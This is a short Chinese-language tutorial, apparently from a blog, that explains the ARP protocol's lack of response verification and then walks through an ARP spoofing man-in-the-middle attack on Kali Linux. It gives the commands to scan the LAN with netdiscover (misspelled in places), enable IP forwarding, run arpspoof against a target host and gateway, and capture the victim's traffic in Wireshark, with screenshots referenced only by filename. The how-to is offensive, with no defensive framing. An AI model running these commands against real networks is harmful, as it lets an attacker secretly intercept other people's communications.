arp是将IP地址转换为mac地址的协议。局域网内的信息交换要基于mac地址进行,所以在同一个局域网内的机器A想要和机器B通讯,它就得通过arp协议获取B的mac地址。
过程:A在局域网中发送广播请求,请求中包含B的IP地址,当B监听到此请求,它就发送一个响应,响应中包含B的mac地址,A收到该响应,就会跟响应中的mac地址进行通讯。
注意这里只要局域网内有机器发送了响应,机器A就认为是机器B发送的,而不会去校验。arp攻击就针对这种漏洞进行攻击,攻击者会分别对机器A和机器B的arp请求进行响应,在A和B之间充当一个中间人,从而监听A和B的通讯。
一. 攻击平台
操作系统
KALI LINUX
攻击软件
- arpspoof
进行arp攻击,在网络中发送伪造的arp请求和响应。 - wireshark
网络报文分析工具,查看被攻击者的网络通讯情况。
二. 步骤
2.1. 扫描局域网主机
netdicover -r 192.168.1.0/24
扫描当前局域网,获取目标的IP地址和网关IP地址
netdisover.png
2.2. arp攻击
2.2.1. 开启内核路由转发功能
echo 1 >> /proc/sys/net/ipv4/ip_forward
2.2.2. 使用arpspoof开启攻击
通过 man arpspoof 可以看该命令的详细信息,此处不赘述。
arpspoof -i eth0 -t 192.168.1.124 -r 192.168.1.1
- -i 指定进行arp攻击的网卡
- -t 目标主机IP
- -r 进行双向攻击
-
最后为网关的IP地址
arpspoof.png
截图即为arpspoof在发送伪ARP响应。
2.3. 分析被攻击者网络报文
打开wireshark 并选择使用arp进行攻击的网卡。
wireshark1.png
在过滤选择器中过滤出目标IP的网络报文
wireshark2.png
网友评论